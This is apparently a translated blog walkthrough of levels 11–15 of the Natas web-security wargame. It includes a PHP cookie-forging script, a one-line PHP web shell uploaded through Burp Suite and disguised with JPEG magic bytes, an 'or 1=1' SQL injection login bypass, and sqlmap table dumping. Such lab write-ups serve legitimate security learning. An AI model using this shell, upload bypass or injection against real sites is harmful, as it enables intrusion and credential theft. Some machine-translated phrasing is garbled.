Clever Geek Handbook

Natas Web. Passage of the CTF platform aimed at exploiting Web vulnerabilities. Part 2

image



In this article, we will deal with the operation of some WEB-identities using the Natas wargame as an example. Each level has access to the next level password. All passwords are also stored in the / etc / natas_webpass / files. For example, the password for natas5 is stored in the file / etc / natas_webpass / natas5 and is read-only for users natas4 and natas5.



Organizational Information
Especially for those who want to learn something new and develop in any of the areas of information and computer security, I will write and talk about the following categories:



  • PWN;
  • cryptography (Crypto);
  • network technologies (Network);
  • reverse (Reverse Engineering);
  • steganography (Stegano);
  • search and exploitation of WEB vulnerabilities.


In addition to this, I will share my experience in computer forensics, analysis of malware and firmware, attacks on wireless networks and local area networks, conducting pentests and writing exploits.



So that you can find out about new articles, software and other information, I created a channel in Telegram and a group to discuss any issues in the field of ICD. Also, I will personally consider your personal requests, questions, suggestions and recommendations personally and will answer everyone .



All information is provided for educational purposes only. The author of this document does not bear any responsibility for any damage caused to anyone as a result of using knowledge and methods obtained as a result of studying this document.



level 11



Parse the code:



  1. the password will be available if the value from the data array with the key showpassword is โ€œyesโ€;



    image
  2. the data array is created by the loadData function, into which default data is passed as a parameter;



    image



    image
  3. the loadData function loads data values โ€‹โ€‹from a cookie (encodes data in base64, encrypts xor on an unknown key, decodes data in json format);



    image



    image
  4. sets the received values.


What you need to do:



  1. recover XOR encryption key:
    • take encrypted data from a cookie;
    • decode base64;
    • encode default data in json format;
    • Proxor received timelines.
  2. encode and encrypt the new data using the inverse algorithm, where showpassword == yes ;
  3. insert the new data into the cookie and reload the page.


image 



<?php function xor_encrypt($in, $k) { $key = $k; $text = $in; $outText = ''; for($i=0;$i<strlen($text);$i++) { $outText .= $text[$i] ^ $key[$i % strlen($key)]; } return $outText; } $old_data_code = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw"; $old_data_decode = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); $new_data_decode = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"); $KEY = xor_encrypt(base64_decode($old_data_code), json_encode($old_data_decode)); echo "key: ". $KEY . "\n"; $KEY="qw8J"; $new_data_code = base64_encode(xor_encrypt(json_encode($new_data_decode), $KEY)); echo "new cookie: " . $new_data_code . "\n"; ?>


image



image



level 12



When you save the file to the site, it is saved under a random name and JPEG extension. But the most important thing is that this name is formed and provided to the user in a hidden field of the hidden form even before the file is selected, and after that it is sent to the server with the file.



image



Task: create php-shell, intercept the request to the server and

change the file name to * .php. 



 <? echo system($_GET["cmd"]); ?>


image



We use Burp Suite: We set the browser proxy settings to 127.0.0.1:8080. Send the shell. In the Proxy tab, we replace the request.



image



image



image



We turn to our file on the server, passing commands to the command line through the cmd parameter. 



 cat /etc/natas_webpass/natas13


image

This type of vulnerability is classified as Unrestricted File Upload.


To create a Shell, it is best to use php constants, since the execution of system functions may be prohibited by the server settings.


level 13



When saving the same shell to the server, we are told that this is not an image. We analyze the code.



image



There is an exif_imagetype function.



image



image



To check the JPEG file, this function uses the internal function is_jpeg, which checks the first four bytes of the file.



image



The fact is that the php interpreter executes code that is between <? ?>, skipping all other characters. Open the shell of the previous level in the hex editor and add bytes 0xFFD8FFE0 to the beginning of the file.



image



Send to the site by analogy with the previous level and get a password.



image



level 14



A common error in the authorization form. Database query: 



 SELECT * from users where username="username" and password="password";


image



It is possible to always make the request true: login = โ€œadminโ€œ or 1 = 1 - โ€.



image



In this case, or 1 = 1 returns true, and the rest of the request is commented out: 



 SELECT * from users where username="admin" or 1=1;


We take away the password.



image

This type of vulnerability belongs to the category of SQL Injection.


level 15



On this form, we analyze the operation of sqlmap. Send a request and intercept the data and the HTTP header.



image



image



We select only the necessary information from the header. In this case: User-Agent, Referer, Authorization. Set sqlmap parameters:





image



Sqlmap determined that the username parameter is vulnerable to Boolean-Based Blind injection, and showed the correct database response to the correct event (in the subsequent scan, you can immediately specify the vulnerable parameter and type of injection: -p username and --technique = B).

B: Boolean-based blind SQL injection

U: UNION query SQL injection

T: Time-based blind SQL injection

E: Error-based SQL injection

S: Stacked queries SQL injection


Sqlmap detected the MySQL DBMS (in subsequent scans, the parameter --dbms = MySQL) and asked if it was necessary to determine the version of mysql (default is yes).



image



Sqlmap reported that MySQL version> = 5.0.12 (this is necessary to select the DBMS utility constants).



image



Sqlmap determined the load for the username parameter and asked if other parameters should be checked (by default, no). It also shows the load.



image



Provides information about the node and, as we requested, the current database: natas15.



image



image



Given the new known data, we find out the tables from the natas15 database:





image



Sqlmap defined one users table.



image



We recognize the columns in the users table:





image



Sqlmap defined 2 columns.



image



We dump the users table (option --dump). The dump took 3 minutes. We execute the request in 8 threads (--threads 8) - as a result: 1 minute.



image



We take away the password.



To be continued. You can join us on Telegram .


More articles:


All Articles